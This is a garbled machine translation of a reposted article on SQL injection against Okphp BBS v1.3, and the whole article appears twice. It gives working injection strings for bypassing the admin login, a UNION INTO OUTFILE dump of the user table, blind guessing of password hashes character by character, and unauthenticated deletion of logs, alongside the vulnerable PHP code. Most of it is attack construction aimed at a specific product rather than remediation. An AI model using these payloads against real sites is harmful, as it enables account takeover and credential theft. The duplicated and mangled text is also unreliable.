PHP attack methods PHP +mysql injection statement construction
- 2020-03-31 16:46:19
- OfStack
I. introduction:
Version information: Okphp BBS v1.3 open source version
Because of PHP and MYSQL itself, the injection of PHP+MYSQL is more difficult than asp, especially when the injection of the construction of the statement is more difficult, this paper is mainly by Okphp BBS v1.3 some files have a simple analysis, to talk about PHP+MYSQL injection statement construction, I hope this paper is a little help to you.
Statement: all the "vulnerabilities" mentioned in the article have not been tested and may not exist. In fact, it is not important whether there are vulnerabilities or not. What matters is the analysis of ideas and sentence construction.
Ii. "vulnerability" analysis:
1. Admin /login.php injection caused bypassing the authentication vulnerability:
Code:
$username and $password are unfiltered and easily bypassed.
Select * from $user_table where username='$username' and password='$password'
Construct 1(using logical operations) : $username=' OR 'a'='a $password=' OR 'a'='a '
Equivalent to SQL statement:
Select * from $user_table where username=' OR 'a'='a' and password=' OR 'a'='a'
Construct 2(use mysql comment #, /* to comment out $password) : $username=admin'#(or admin'/*)
That is:
Select * from $user_table where username='admin'#' and password='$password'"
Is equivalent to:
Select * from $user_table where username='admin'
The $password in the $q statement in admin/login.php is md5 encrypted before the query so it cannot be bypassed with the statement in construct 1. Here we use construction 2:
Select id,group_id from $user_table where username='admin'#' and password='$password'"
Is equivalent to:
Select id,group_id from $user_table where username='admin'
As long as the user name admin exists, it is valid. If you don't know the user name, you only know the corresponding id.
This is how we construct it: $username=' OR id=1#
Is equivalent to:
Select id,group_id from $user_table where username= "OR id=1# and password='$password'(# after commented out)
Let's move on to the code:
Finally, simply by a $login to judge, we as long as ie submitted directly submitted $login=1 can bypass :).
2. Users /login.php injection caused bypassing the authentication vulnerability:
Code:
$username is unfiltered and password='$md5password'";
3. Admin \log\list. PHP has arbitrary deletion logging vulnerability. Ps: this seems to have nothing to do with the injection of PHP +mysql.
The background of okphp seems to be written carelessly, and all the files are accessed arbitrarily without checking whether the administrator has logged in or not. Let's look at the list.php code:
The code simply USES get_r($arr); To determine the submitted parameter, we just need to submit the corresponding $del_log, $log_id, and $del_id. Delete back to success.
4. Multiple files do not filter variables, resulting in SQL injection vulnerability.
The authors of okphp don't seem to like filtering :). Basically all variables in SQL statements are "naked." So I'm not going to list those files, but I'm going to look at the code for myself, and I'm going to talk a little bit about them using \ fields \list_threads.php as an example.
Look at the code for list_threads.php:
The variable $forum_id is not filtered, because mysql does not support subqueries, we can use the union construction statement for joint queries (requiring mysql version 4.00 or above) to achieve cross-library operations, we construct as follows:
Construct 1: SELECT * FROM table INTO OUTFILE '/path/file.txt'(mysql is required to have file permissions, note the absolute path in Windows, such as: c://path//file.txt). Input the contents of the query to file.txt, then we can access the query results through http://ip/path/file.txt. Above, we can construct $forum_id like this:
$forum_id=' union select * from user_table into outfile '/path/file.txt'
The following:
$q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id='$forum_id' union select * from user_table into Outfile '/ path/file. TXT ";
The above approach is more demanding, requiring you to get the path to the web (which is typically obtained by submitting the wrong variable to cause mysql to report an error), and PHP's magic_gpc=on option prevents single quotes from being injected. If magic_gpc=on we can also bypass:
Construct 2: just like the asp cross-library query, the union select construct statement is used directly to guess the solution with different results. This method can bypass the single quotes (magic_gpc=on) to continue the injection, but this injection is relatively difficult in PHP, depending on the specific code. Please refer to pinkeyes' article "PHP injection instances" for detailed statement construction. Here's an example of using "return different" injections in conjunction with okphp :(see vulnerability 5).
Admin /login.php and users/login.php can guess the solution to the specified user password through the construction of SQL statement hash :(actually, this is the same as vulnerability 1 and 2, which is taken out separately here, mainly to explain the method of statement construction.)
The problem code is the same as vulnerability 1.
Statement construction (ps: there is no need to use union because the statement itself is an operation on the user library) :
$username = admin 'AND LENGTH (password) = # 6
The SQL statement becomes:
$q = "select id,group_id from $user_table where username='admin' AND LENGTH(password)=6#' AND password='$password'"
Is equivalent to:
$q = "select id,group_id from $user_table where username='admin' AND LENGTH(password)=6'"
If LENGTH(password)=6 is true, it returns normally, if not, mysql will report an error.
So we can guess the user admin password hash. Such as $username = admin 'word (substring (password, 1, 1)) = # 57
Can guess the user's password first ASCII code value... .
Version information: Okphp BBS v1.3 open source version
Because of PHP and MYSQL itself, the injection of PHP+MYSQL is more difficult than asp, especially when the injection of the construction of the statement is more difficult, this paper is mainly by Okphp BBS v1.3 some files have a simple analysis, to talk about PHP+MYSQL injection statement construction, I hope this paper is a little help to you.
Statement: all the "vulnerabilities" mentioned in the article have not been tested and may not exist. In fact, it is not important whether there are vulnerabilities or not. What matters is the analysis of ideas and sentence construction.
Ii. "vulnerability" analysis:
1. Admin /login.php injection caused bypassing the authentication vulnerability:
Code:
$conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname);
$password = md5($password);
$q = "select id,group_id from $user_table where username='$username' and password='$password'";
$res = sql_query($q,$conn);
$row = sql_fetch_row($res);
$q = "select id,group_id from $user_table where username='$username' and password='$password'" In the
$username and $password are unfiltered and easily bypassed.
Select * from $user_table where username='$username' and password='$password'
Construct 1(using logical operations) : $username=' OR 'a'='a $password=' OR 'a'='a '
Equivalent to SQL statement:
Select * from $user_table where username=' OR 'a'='a' and password=' OR 'a'='a'
Construct 2(use mysql comment #, /* to comment out $password) : $username=admin'#(or admin'/*)
That is:
Select * from $user_table where username='admin'#' and password='$password'"
Is equivalent to:
Select * from $user_table where username='admin'
The $password in the $q statement in admin/login.php is md5 encrypted before the query so it cannot be bypassed with the statement in construct 1. Here we use construction 2:
Select id,group_id from $user_table where username='admin'#' and password='$password'"
Is equivalent to:
Select id,group_id from $user_table where username='admin'
As long as the user name admin exists, it is valid. If you don't know the user name, you only know the corresponding id.
This is how we construct it: $username=' OR id=1#
Is equivalent to:
Select id,group_id from $user_table where username= "OR id=1# and password='$password'(# after commented out)
Let's move on to the code:
if ($row[0]) {
// If not admin or super moderator
if ($username != "admin" && !eregi("(^|&)3($|&)",$row[1])) {
$login = 0;
}
else {
$login = 1;
}
}
// Fail to login---------------
if (!$login) {
write_log("Moderator login","0","password wrong");
echo " ";
exit();
}
// Access ! -------------
else {
session_start();
Finally, simply by a $login to judge, we as long as ie submitted directly submitted $login=1 can bypass :).
2. Users /login.php injection caused bypassing the authentication vulnerability:
Code:
$md5password = md5($password);
$q = "select id,group_id,email from $user_table where username='$username' and password='$md5password'";
$res = sql_query($q,$conn);
$row = sql_fetch_row($res);
$username is unfiltered and password='$md5password'";
3. Admin \log\list. PHP has arbitrary deletion logging vulnerability. Ps: this seems to have nothing to do with the injection of PHP +mysql.
The background of okphp seems to be written carelessly, and all the files are accessed arbitrarily without checking whether the administrator has logged in or not. Let's look at the list.php code:
$arr = array("del_log","log_id","del_id");
get_r($arr);
//
if ($del_log) {
omit ........
if ($log_id) {
foreach ($log_id as $val) {
$q = "delete from $log_table where id='$val'";
$res = sql_query($q,$conn);
if ($res) {
$i++;
}
}
}
elseif ($del_id) {
$q = "delete from $log_table where id='$del_id'";
$res = sql_query($q,$conn);
}
$tpl->setVariable("message","$i log deleted ok!");
$tpl->setVariable("action","index.php?action=list_log");
}
The code simply USES get_r($arr); To determine the submitted parameter, we just need to submit the corresponding $del_log, $log_id, and $del_id. Delete back to success.
4. Multiple files do not filter variables, resulting in SQL injection vulnerability.
The authors of okphp don't seem to like filtering :). Basically all variables in SQL statements are "naked." So I'm not going to list those files, but I'm going to look at the code for myself, and I'm going to talk a little bit about them using \ fields \list_threads.php as an example.
Look at the code for list_threads.php:
$q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id='$forum_id'";
$res = sql_query($q,$conn);
$row = sql_fetch_row($res);
The variable $forum_id is not filtered, because mysql does not support subqueries, we can use the union construction statement for joint queries (requiring mysql version 4.00 or above) to achieve cross-library operations, we construct as follows:
Construct 1: SELECT * FROM table INTO OUTFILE '/path/file.txt'(mysql is required to have file permissions, note the absolute path in Windows, such as: c://path//file.txt). Input the contents of the query to file.txt, then we can access the query results through http://ip/path/file.txt. Above, we can construct $forum_id like this:
$forum_id=' union select * from user_table into outfile '/path/file.txt'
The following:
$q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id='$forum_id' union select * from user_table into Outfile '/ path/file. TXT ";
The above approach is more demanding, requiring you to get the path to the web (which is typically obtained by submitting the wrong variable to cause mysql to report an error), and PHP's magic_gpc=on option prevents single quotes from being injected. If magic_gpc=on we can also bypass:
Construct 2: just like the asp cross-library query, the union select construct statement is used directly to guess the solution with different results. This method can bypass the single quotes (magic_gpc=on) to continue the injection, but this injection is relatively difficult in PHP, depending on the specific code. Please refer to pinkeyes' article "PHP injection instances" for detailed statement construction. Here's an example of using "return different" injections in conjunction with okphp :(see vulnerability 5).
Admin /login.php and users/login.php can guess the solution to the specified user password through the construction of SQL statement hash :(actually, this is the same as vulnerability 1 and 2, which is taken out separately here, mainly to explain the method of statement construction.)
The problem code is the same as vulnerability 1.
Statement construction (ps: there is no need to use union because the statement itself is an operation on the user library) :
$username = admin 'AND LENGTH (password) = # 6
The SQL statement becomes:
$q = "select id,group_id from $user_table where username='admin' AND LENGTH(password)=6#' AND password='$password'"
Is equivalent to:
$q = "select id,group_id from $user_table where username='admin' AND LENGTH(password)=6'"
If LENGTH(password)=6 is true, it returns normally, if not, mysql will report an error.
So we can guess the user admin password hash. Such as $username = admin 'word (substring (password, 1, 1)) = # 57
Can guess the user's password first ASCII code value... .